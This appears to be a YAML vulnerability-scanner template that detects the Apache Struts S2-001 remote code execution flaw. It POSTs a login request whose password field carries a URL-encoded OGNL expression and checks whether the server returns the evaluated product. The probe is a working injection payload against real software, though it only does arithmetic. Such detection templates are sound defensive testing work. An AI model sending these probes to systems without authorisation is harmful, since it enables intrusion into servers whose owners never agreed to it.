id: struct-s2-001
info:
  name: Apache Struct S2-001 - RCE
  risk: High

requests:
  - method: POST
    redirect: false
    url: >-
      {{.BaseURL}}{{.Path}}/login.action
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      username=asdas&password=%25%7B191191191*7%7D
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "1338338337")

reference:
  author: theblackturtle
